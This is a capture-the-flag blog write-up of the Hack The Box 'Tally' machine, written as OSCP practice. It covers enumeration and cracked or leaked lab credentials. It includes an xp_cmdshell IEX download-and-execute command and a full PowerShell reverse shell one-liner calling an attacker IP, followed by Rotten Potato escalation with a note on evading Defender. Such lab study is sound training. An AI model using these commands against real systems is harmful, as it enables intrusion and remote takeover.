Hack The Box / Tally
Tally is our third machine in the OSCP list provided by NetSec Focus! This machine was a great learning experience where the solution problem and research skills were essential in order to root this machine. This is the third blog before my third attempt to the OSCP exam, so let’s get to it!
Information Gathering
Nmap Scan
So, we start with a nmap scan to check what ports are open and what services are running in this machine.
nmap -sC -sV -p- -oN scan.nmap 10.10.10.59
So, we see some SMB, MSSQL and HTTP services running where all of them are going to be useful. The enumeration in this box is quite extense, but with some persistence and patiente, the clues are going to be coming out one at the time. I also tried to scan most of the HTTP services with not good result, but there was one that actually was useful that I’ll explain later. After looking at the smb service running, I tried to do some scanning to see if I could find anything, but unf ortunately the result was not helpful.
But after looking for more resources and things to look up in our nmap scan, there was a good attack vector that was related with Microsoft Sharepoint running in port 32844.
Directory & URL Brute Force
After looking how other people did this machine, there were a lot of ideas and tools. One of the tools was the SharePountURLBrute that was accurate in some results. This is the command in order to use the tool:
perl SharePointURLBrute.pl -a http://10.10.10.59 -e SharePoint-UrlExtensions-18Mar2012.txt
Although other people runned gobuster to get some results, but in my case SharePountURLBrute gave more accurate results. In the case if you want to run gobuster, I strongly recommend to download SecLists in order to have good results. This is the command to run gobuster.
gobuster dir -w /usr/share/seclists/Discovery/Web-Content/CMS/sharepoint.txt -u http://10.10.10.59/
After finding a couple URLs, the URl that gave useful information was http://10.10.10.59/shared%20documents/forms/allitems.aspx
where there was some details about the ftp log in.
After downloading the file, we have the following information.
Great! There is a password, but we don’t have a username. It’s time to look for more URLs in Microsoft Sharepoint. After trying more tools and not finding results, I tried to look on google things like "sharepoint site content url"
where it came up with this useful resource. So, according to the site one of the URLs that contains information and content was http://10.10.10.59/_layouts/15/viewlsts.aspx
where effectively there was something to look!
So after visiting http://10.10.10.59/SitePages/FinanceTeam.aspx
There was a useful file from the Finance Team that contained useful information about the ftp_server.
This is the information that is related with the ftp user account.
Gratefully, we have username and password which means ftp_user:UTDRSCH53c"$6hys
FTP Findings
Then, after trying the credentials, log in was successsful.
Once we are in the ftp server there is a interesting file that we can find at \User\Tim\Files
which is a KeePass file that will be helpful to look more credentials.
Cracking passwords
Once you find it and get it, you can crack it with keepass2john in order to obtain and extrack the hash with the following command.
keepass2john tim.kdbx > tim
After we have the hash from thh kdbx file, it’s time to crack it wiht John!
john -w=/usr/share/wordlists/rockyou.txt tim
Then it’s time to get in with our credentials tim:simplementeyo
.
If you need more information on how to do the process showed above, do not forget to visit my writeup for Jeeves where I explain the process with detail.
SMB Findings
After getting in the password manager, there is some information about the Finance user, and if we think about what services we can get in, there is a good chance that we can log in with SMB. So to log in in SMB these are the credentials: Finance:Acc0unting
. This is the command to log in with SMB.
smbclient -U Finance \\\\10.10.10.59\\ACCT
After looking around in the server and files, in the location \zz_Migration\Binaries\New Folder
there is a executable called tester.exe
where looks like it’s been customized and therefore it can contain useful information, so after downloading the file tester.exe
there is a good way to look to possible info with the command strings
.
strings tester.exe | grep "UID"
Then we have credentials sa:GWE3V65#6KFH93@4GWTG2G
for MSSQL ツ
To log in in MSSQL there is a good tool in Kali Linux called sqsh that allows login in MSSQL and various services and it’s a sql shell for linux. So, after googling "MSSQL reverse shell"
it came up with the resource and usage of xp_cmdshell which allows to execute commands from the command prompt in some kidn of RCE (Remote Code Execution), the problem is that xp_cmdshell is desable, but we can enable it following this resource. So, this is the command to log in MSSQL with sqsh.
sqsh -S 10.10.10.59 -U sa -P GWE3V65#6KFH93@4GWTG2G
Then, time to get the reverse shell.
Reverse shell
To do this we can use xp_cmdshell to execute a command that will download a powershell script from Nishang that will return us a reverse shell to our local machine. Do not forget to put this in the last line of the script Invoke-PowerShellTcp -Reverse -IPAddress 10.10.16.80 -Port 4444
otherwise the script won’t work and do not forget to set up a netcat listener and a python HTTP server. This is the following command to execute within sqsh using xp_cmdshell.
xp_cmdshell "powershell IEX(New-Object Net.WebClient).downloadString('http://10.10.16.80/Invoke-PowerShellTcp.ps1') "
and wolah! We got a shell.
User flag
In order to get the user flag we need to navigate to C:\Users\Sarah\Desktop
and type type user.txt
and we got the flag!
Privilege Escalation
This time I decided to use Rotten Potato without metasploit because in the enumeration there was enough resources to escalate privileges in this way. To start type:
whoami /priv
And we have enough privileges to use Rotten Potato. We can go to any directory where we have executable and writeable privileges in order to transfer [MSFRottenPotato.exe]. Also this machine is running Windows 10 from 2016 which is more likely to have Windows Defender, so be wise about the reverse shell that you want to execute with Rotten Potato. In this case I decided to use a powershell script that Windows Defender won’t recognize as a malicious file, so create a file in your linux machine named shell.bat
and type the following code:
powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('10.10.16.80',443);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (IEX $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
and transfer it to the windows machine. You can use veil-evasion or Ebowla where both of them are nice tools, but this time I decided to keep it simple as possible.
Executing Rotten Potato
Before executing Rotten Potato do not forget to set up a listener with netcat in the port that you have decided to use to get the reverse shell. After the listener is up in you reverse shell type:
C:\Users\Sarah\Documents\MSFRottenPotato.exe t C:\Users\Sarah\Documents\shell.bat
and we have a reverse shell as authority system!
Root Flag
Navigate through C:\\Users\Administrator\Desktop\
and type type root.txt
.
And we have root!
To conclude
This machine took me too long due to the extense enumeration required. I learned to use certain tools such as sqsh and also to check the nmap scan well because some of the rabbit holes were because I didn’t read well the nmap scan which had enough clues to try different things, but definetelly it was a fun box.
Leave a comment